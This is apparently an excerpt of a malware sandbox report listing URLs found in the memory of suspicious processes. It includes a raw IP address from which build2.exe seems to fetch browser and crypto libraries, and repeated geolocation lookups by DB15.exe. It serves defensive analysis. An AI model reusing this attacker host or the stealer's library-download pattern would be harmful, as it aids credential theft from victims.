            Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/Y
            Source: build2.exe, 00000029.00000002.3569722785.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/f
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/freebl3.dll
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/freebl3.dllZ
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/freebl3.dllal
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/mozglue.dll
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/mozglue.dllN
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/msvcp140.dll:T
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/msvcp140.dllr
            Source: build2.exe, 00000029.00000002.3569722785.0000000000955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/nss3.dll
            Source: build2.exe, 00000029.00000002.3569722785.0000000000955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/nss3.dll4I
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/rtin
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/softokn3.dll
            Source: build2.exe, 00000029.00000002.3568020251.0000000000523000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/sqlm.dll
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/ss3.dll
            Source: build2.exe, 00000029.00000002.3569722785.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/tera)I
            Source: build2.exe, 00000029.00000003.3332643203.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3332868642.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/v(T
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/vcruntime140.dll
            Source: build2.exe, 00000029.00000002.3569722785.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/y
            Source: build2.exe, 00000029.00000002.3568020251.0000000000600000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36Data
            Source: build2.exe, 00000029.00000002.3568020251.0000000000567000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36FIDAK
            Source: build2.exe, 00000029.00000002.3568020251.0000000000529000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36IJDHI
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36JKEHC
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 00000002.00000000.2110427730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
            Source: explorer.exe, 00000002.00000000.2112529074.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: DB15.exe, 0000000C.00000002.2840859633.000000000075A000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000003.2851421571.0000000000598000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2982508997.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2977655775.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2978332467.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061975494.0000000000748000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000003.3060772221.0000000000759000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3062137108.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
            Source: DB15.exe, 0000000C.00000002.2840859633.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/%4R
            Source: DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/-1
            Source: DB15.exe, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000003.2851421571.0000000000598000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000013.00000003.2851421571.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.0000000000548000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2978332467.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2982508997.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2982508997.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2977655775.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2980820218.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2978332467.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2977655775.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000003.3060772221.0000000000795000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061975494.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
            Source: DB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000003.2851421571.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json-
            Source: DB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json5
            Source: DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json?u7
            Source: DB15.exe, 00000013.00000002.4517742104.0000000000548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonB
            Source: DB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2980820218.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonM
            Source: DB15.exe, 0000001C.00000003.3060772221.0000000000795000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3062137108.0000000000795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonPn
            Source: DB15.exe, 0000001C.00000002.3061975494.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonSai
            Source: DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json_P
            Source: DB15.exe, 00000013.00000003.2851421571.0000000000598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonf
            Source: DB15.exe, 0000001C.00000003.3060772221.0000000000759000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3062137108.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonl
            Source: DB15.exe, 00000013.00000003.2851421571.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonmX
            Source: DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonoD
            Source: DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonoz
            Source: DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061975494.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
            Source: DB15.exe, 0000001C.00000003.3060772221.0000000000759000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3062137108.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/hz
            Source: DB15.exe, 0000001C.00000002.3061975494.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/icrosoft
            Source: explorer.exe, 00000002.00000000.2110113315.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4538945131.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200607811.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4418026226.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3196669836.000000000943F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000002.00000000.2110113315.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200607811.0000000009421000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3201833144.0000000007D0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3196669836.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193896166.0000000009421000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193896166.00000000092EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000002.00000000.2110113315.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4538945131.0000000009283000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4418026226.0000000009283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000022.00000003.3193896166.0000000009363000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4418026226.0000000009363000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4538945131.0000000009363000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200607811.0000000009363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?4H
            Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4538945131.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200607811.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4418026226.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3196669836.000000000943F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://blockchain.infoindex
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHl
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=GRA9
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
